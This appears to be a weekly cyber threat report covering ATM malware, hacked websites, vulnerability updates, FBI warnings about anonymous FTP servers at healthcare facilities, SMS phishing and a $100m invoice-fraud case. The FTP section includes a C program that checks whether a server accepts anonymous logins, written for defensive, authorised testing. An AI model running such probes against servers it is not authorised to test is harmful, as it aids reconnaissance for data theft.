There have been no reported incidents of network-delivered ATM malware attacks against UK ATMs to date. The most common attacks seen against UK ATMs continue to be more traditional physical attacks, which criminals carry out to varying levels of success. For more information on the malware threat to UK ATMs, log in to the Cyber-security Information Sharing Partnership (CiSP) to view our recently published report. Please see details on how to become a member of CiSP.

Rise in compromised websites

According to a recent Google report, the number of websites that were hacked in 2016 was 32% higher than in 2015. Google assesses that this trend is unlikely to lose momentum "as hackers get more aggressive and more sites become outdated".

Although it is difficult to corroborate this statistic or clarify what proportion of the allegedly compromised websites were active, the threat to websites from cybercriminals has definitely risen over recent years, with ransomware and financial scams particularly strong incentives for them to compromise websites in order to facilitate cybercrime.

Google says the problem was compounded by the fact that 61% of webmasters whose websites were breached had not registered with Search Console, Google's channel for site health alerts, and were therefore not notified by Google of the compromise.

The NCSC recommends that website owners follow NCSC guidance and regularly patch known vulnerabilities to reduce the risk of a compromise. We recommend that the public follow the malware prevention advice in 10 Steps to Cyber Security to reduce the risk of being infected by malware served from compromised websites, and you may also find our guidance on designing digital services useful. Following the guidance can help prevent some of the most prevalent types of web attack currently being carried out.

Website owners may also find OWASP's Top 10 project, which represents a broad consensus about what the most critical web application security flaws are, useful.

Vulnerabilities

Reports came in this week of a WebDAV buffer overflow vulnerability affecting Microsoft's Internet Information Services (IIS). There are reports that this vulnerability is being actively exploited and, at the time of writing, Microsoft does not yet have a fix available. NIST's National Vulnerability Database (NVD) has details. The NCSC recommends that, where on-premises installations are still needed, the latest versions of software are used (Windows Server 2016 in this case), as they are more secure by default. Where WebDAV is not needed on an IIS server, disabling it removes the exposed attack surface. If we receive more information on this vulnerability we will update accordingly.

Apple released an update for their iOS mobile operating system to fix a bug that could allow remote code execution within Wi-Fi range of the device.

McAfee ePolicy Orchestrator fixed a flaw in the anti-malware engine that could allow local users to cause denial of service conditions. RSA Archer GRC Security Operations Management resolved an error where local users could view passwords. Django suffered from an input validation error that could lead to remote users conducting cross-site scripting and open redirect attacks.

Elsewhere this week there were updates from HPE Business Process Monitor, Asterisk, MantisBT, PHP, WebsiteBaker, the Linux Kernel and Splunk.

Debian specific updates this week were for Samba to fix a regression bug, Firebird2.5 and Tryton-server.

ICS updates this week included several from Schneider Electric (Wonderware, Modicon, Interactive Graphical SCADA), Siemens RUGGEDCOM ROX I, Rockwell Automation Allen-Bradley Stratix and ArmorStratix, Miele, Marel Food Processing, LCDS, BD Kiestra and 3S-Smart.

Criminals target US healthcare sector

The cyber division of the FBI recently issued an alert warning of criminal activity targeting File Transfer Protocol (FTP) servers operating in ‘anonymous’ mode at US medical and dental facilities.

The criminals involved are reportedly motivated by the potential to access protected health information (PHI) and personally identifiable information (PII). This data is then used by criminals to extort healthcare business owners, and to conduct financial fraud and identity theft.

The US healthcare sector has previously been targeted by ransomware campaigns, but this methodology is more aggressive. Rather than encrypting data and releasing it once a ransom is paid, the criminals steal sensitive data and in some instances threaten to expose or sell it, to pressure victim companies into paying.

FTP is a protocol widely used to transfer files. However, when an FTP server is configured for ‘anonymous’ access, that is, to accept a generic username such as anonymous or ftp with any or no password, any data stored on that server is exposed to anyone who can reach it. This was highlighted by research conducted by the University of Michigan in 2015, which showed more than one million FTP servers were misconfigured in this way, potentially allowing unauthorised access to data.

The US healthcare sector is singled out in the FBI report as the target of an active criminal campaign, however any organisation storing sensitive data on a misconfigured FTP server could similarly be exposed to extortion or fraud.
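A quick way to check whether a server you are responsible for accepts anonymous logins is to walk through the FTP login exchange and look at the reply codes, as in the added example below (not code from the FBI alert or the University of Michigan study). An FTP server answers each step with a three-digit code: 220 is the greeting, 331 means "send a password", 230 means "logged in" and 530 means "refused". The probe sends USER anonymous followed by a placeholder e-mail address as the password, the RFC 1635 convention, and reports whether a 230 comes back; it never lists or transfers anything. So the exchange can be exercised without network access, the block also contains a constructed stand-in server on a socketpair that mimics both configurations; that server, its banner text and the probe password are assumptions made for the example.

```c
#define _GNU_SOURCE
#include <pthread.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* Read one CRLF-terminated line (CR/LF stripped); returns its length or -1. */
static int read_line(int fd, char *buf, size_t cap)
{
    size_t n = 0;
    char c;
    while (n + 1 < cap) {
        if (read(fd, &c, 1) <= 0) return -1;
        if (c == '\n') break;
        if (c != '\r') buf[n++] = c;
    }
    buf[n] = '\0';
    return (int)n;
}

/* Read a complete FTP reply, including RFC 959 multi-line replies ("220-..."),
 * which end with a line beginning "<code> ". Returns the 3-digit code or -1. */
static int read_reply(int fd)
{
    char line[512];
    if (read_line(fd, line, sizeof line) < 3 || strspn(line, "0123456789") < 3) return -1;
    int code = (line[0] - '0') * 100 + (line[1] - '0') * 10 + (line[2] - '0');
    if (line[3] == '-') {
        char end[5] = { line[0], line[1], line[2], ' ', '\0' };
        do { if (read_line(fd, line, sizeof line) < 0) return -1; }
        while (strncmp(line, end, 4) != 0);
    }
    return code;
}

/* Send one command line; MSG_NOSIGNAL turns a closed peer into EPIPE, not SIGPIPE. */
static int send_cmd(int fd, const char *cmd)
{
    size_t n = strlen(cmd);
    return send(fd, cmd, n, MSG_NOSIGNAL) == (ssize_t)n ? 0 : -1;
}

/* Probe an already-connected FTP control channel for anonymous access. Returns 1 if
 * "anonymous" gets logged in (with or without a password), 0 if the server refuses,
 * -1 on a protocol error. Nothing is listed, fetched or written. */
int ftp_anonymous_allowed(int fd)
{
    if (read_reply(fd) != 220) return -1;                  /* service-ready banner */
    if (send_cmd(fd, "USER anonymous\r\n") < 0) return -1;
    int code = read_reply(fd);
    if (code == 230) return 1;                             /* in without a password */
    if (code != 331) return code < 0 ? -1 : 0;             /* 530 etc.: refused */
    if (send_cmd(fd, "PASS probe@example.com\r\n") < 0) return -1;
    code = read_reply(fd);
    return code == 230 ? 1 : (code < 0 ? -1 : 0);
}

/* Constructed stand-in for a server so the probe can be exercised offline: it mimics
 * a vsftpd-style exchange (331 after USER, then 230 or 530 after PASS). */
struct fake { int fd; int allow_anonymous; };

static void *fake_server(void *arg)
{
    struct fake *f = arg;
    char line[256];
    send_cmd(f->fd, "220-Constructed banner, not a real server\r\n220 Ready.\r\n");
    if (read_line(f->fd, line, sizeof line) > 0 && strncmp(line, "USER ", 5) == 0) {
        send_cmd(f->fd, "331 Please specify the password.\r\n");
        if (read_line(f->fd, line, sizeof line) > 0)
            send_cmd(f->fd, f->allow_anonymous ? "230 Login successful.\r\n" : "530 Login incorrect.\r\n");
    }
    close(f->fd);
    return NULL;
}

/* Run the probe against the constructed server over a socketpair. */
int probe_constructed_server(int allow_anonymous)
{
    int sv[2];
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) < 0) return -1;
    struct fake f = { sv[1], allow_anonymous };
    pthread_t t;
    if (pthread_create(&t, NULL, fake_server, &f) != 0) { close(sv[0]); close(sv[1]); return -1; }
    int result = ftp_anonymous_allowed(sv[0]);
    close(sv[0]);
    pthread_join(t, NULL);
    return result;
}

int main(void)
{
    printf("constructed server, anonymous enabled:  %d\n", probe_constructed_server(1));
    printf("constructed server, anonymous disabled: %d\n", probe_constructed_server(0));
    return 0;
}
```

To test a server you own, open a TCP connection to port 21 with getaddrinfo() and connect() and pass the descriptor to ftp_anonymous_allowed(); a return of 1 is the misconfiguration described above. On vsftpd the corresponding setting is anonymous_enable=NO in vsftpd.conf. Only probe systems you are authorised to test.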

Asian cyber criminals demonstrate ongoing professionalisation

According to a report by the security company Check Point, cyber criminals in Asia are using fake mobile base stations to impersonate legitimate telecommunications companies while conducting SMS phishing ('SMiShing') campaigns. Their text messages link to malware dubbed the "Swearing Trojan" (because of the profanity in its code), which steals banking details. It circumvents SMS-based two-factor authentication by replacing the phone's messaging app with a malicious duplicate.

SMS spam is a lucrative business for criminals in Asia, who also mount fake base stations in vehicles and drive through cities. Nearby mobile devices connect to the stronger signal, allowing the spammers to transmit large numbers of SMS messages, often with spoofed sender information, without paying network fees.

SMS spam is currently less common in the UK and, unlike email spammers, SMS spammers rarely operate across national borders because of the cost of sending text messages internationally. Nevertheless, this development abroad illustrates the ongoing professionalisation of cyber crime, and the readiness of criminals to combine existing techniques in innovative ways to exploit their victims. One of the themes of the last year, as reported in the joint NCA/NCSC cyber threat report 2016-17, is that the risk from cyber crime is growing as criminals become more creative.

Two major US technology firms 'tricked out of $100m'

Evaldas Rimasauskas posed as Asian-based hardware manufacturer to trick staff into wiring him money

A Lithuanian man has been charged with tricking two US technology firms into wiring him $100m (£80.3m) through an email phishing scam.

Posing as an Asian-based manufacturer, Evaldas Rimasauskas tricked staff into transferring money into bank accounts under his control, US officials said.

The companies were not named but were described as US-based multinationals, with one operating in social media.

Officials called it a wake-up call for even "the most sophisticated" firms.

According to the US Department of Justice, Mr Rimasauskas, 48 - who was arrested in Lithuania last week - deceived the firms from at least 2013 up until 2015.

He allegedly registered a company in Latvia which bore the same name as an Asian-based computer hardware manufacturer and opened various accounts in its name at several banks.

'Fake email accounts'

The DoJ said: "Thereafter, fraudulent phishing emails were sent to employees and agents of the victim companies, which regularly conducted multimillion-dollar transactions with [the Asian] company."

The emails, which "purported" to be from employees and agents of the Asian firm, and were sent from fake email accounts, directed money for legitimate goods and services into Mr Rimasauskas's accounts, the DoJ said.

The cash was then "wired into different bank accounts" in locations around the world - including Latvia, Cyprus, Slovakia, Lithuania, Hungary and Hong Kong.

He also "forged invoices, contracts and letters" to hide his fraud from the banks he used.

Officials said Mr Rimasauskas siphoned off more than $100m in total, although much of the stolen money has been recovered.

Acting US Attorney Joon H Kim said: "This case should serve as a wake-up call to all companies... that they too can be victims of phishing attacks by cybercriminals.

"And this arrest should serve as a warning to all cybercriminals that we will work to track them down, wherever they are, to hold them accountable."

The DoJ would not comment on possible extradition arrangements and said that no trial date had been set.
